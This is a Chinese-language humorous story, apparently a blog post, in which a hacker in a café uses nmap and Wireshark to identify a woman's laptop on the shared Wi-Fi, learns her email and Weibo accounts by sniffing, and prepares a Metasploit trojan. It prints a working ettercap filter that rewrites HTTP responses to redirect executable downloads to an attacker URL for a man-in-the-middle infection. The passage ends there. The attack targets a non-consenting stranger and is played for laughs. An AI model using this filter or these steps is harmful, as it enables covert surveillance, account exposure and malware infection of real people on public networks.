众所周知黑客都是技术宅,在电脑强烈的辐射下,技术宅迟早有一日成为了大家心目中的“屌丝”,当然黑客没有女朋友那是理所当然的。可是没女朋友就真的愿意当一个屌丝吗?当然不是,当屌丝我们也要当一个“幸福”的屌丝黑客是神秘的,可以出现在地球的任意一个角落,当然火星也是可以去的,在黑客眼中,对他来说没有什么是隐私,因为根本没有这个词,“没女朋友,可笑!”“你不知道吗?只要是女的都是我的女朋友”Only站起来严肃的看着我们说Only是我的大学同学,也是一个非常出色的黑客,(黑客?他就是一个屌丝)大家有时候坐在一起都会嘲笑他还没有找到女朋友,同学们都一个个的结婚了,甚至有的孩子都上小学了。Only比较内向,平时都不怎么说话,大家一直开他玩笑,他也都习惯了,有时候就笑笑略过了,根本不会去计较什么!大家看到Only这么严肃都被吓到了,整个咖啡厅都安静了,不一会隔壁桌的一个女孩发出了笑声,应该是在嘲笑他刚才说的那句话,Only有点脸红了,淡定的坐了下来“你看!你吹牛把妹纸都逗笑了”“刚那妹纸长得挺清秀的,你让她做你女朋友呗”..............各种嘲讽的话语让Only终于忍不住了,Only打开了桌上的笔记本看了下自己的IP地址:
然后再用nmap探测了下wifi内存活的主机
分析了下192.168.169.1192.168.169.254应该是路由器192.198.168.130是自己的主机那剩下的应该是咖啡馆里其他用户的主机“你在干什么”大家都很好奇“不是你们说让那个女孩做我的女朋友吗?看着吧”Only露出了邪恶的笑容我转头看了下隔壁桌的妹子,妹子一个人在写什么东西(应该是这样的)only估计是想搞下那个妹子的电脑,only扫描了咖啡厅所有的电脑只有这几个在线,所以其中一台肯定是妹子的主机现在只要确定那一台是妹子的主机就可以了最简单的方法就是去问?(显然不可能,妹子又不傻)现在如果妹子在各种浏览什么网页,也许可以通过嗅探数据得到到底那一台是妹子的电脑,0nly打开了wireshark进行了抓包嗅探,因为好多个主机有大量的数据包,所以分析数据是很费时费力的,Only一直在盯着妹子,好像在等待什么,突然他又露出了那诡异的笑容“就是这个”我们都凑过去看
“你怎么知道的”“刚她登录邮箱发邮件了”Only你可真是屌丝啊,I服了you!确定了妹子的IP地址是 192.168.169.131从嗅探中Only得知了妹子经常会用QQ邮箱发邮件和上微博,知道了妹子的QQ号和微博号这还不够让Only满足,他打开nmap探测了下妹子的操作系统
居然用的XP,那可以用ettercap进行欺骗然后挂马了这样就可以获得妹子的主机权限了Only用metasploit(神器)生成了一个木马
Only打开了ettercap准备进行中间人攻击首先新建一个规则
# replace rmccurdy with your website # replace the url with what ever exe you like if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("keep-alive", "close" "); replace("Keep-Alive", "close" "); } if (ip.proto == TCP && search(DATA.data, ": application") ){ # enable for logging log(DECODED.data, "/tmp/log.log"); msg("found EXE\n"); # "Win32" is the first part of the exe example: # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc .. if (search(DATA.data, "Win32")) { msg("doing nothing\n"); } else { replace("200 OK", "301 Moved Permanently Location: http://www.xxx.com/exe.exe "); msg("redirect success\n"); } }
然后改掉里面的下载地址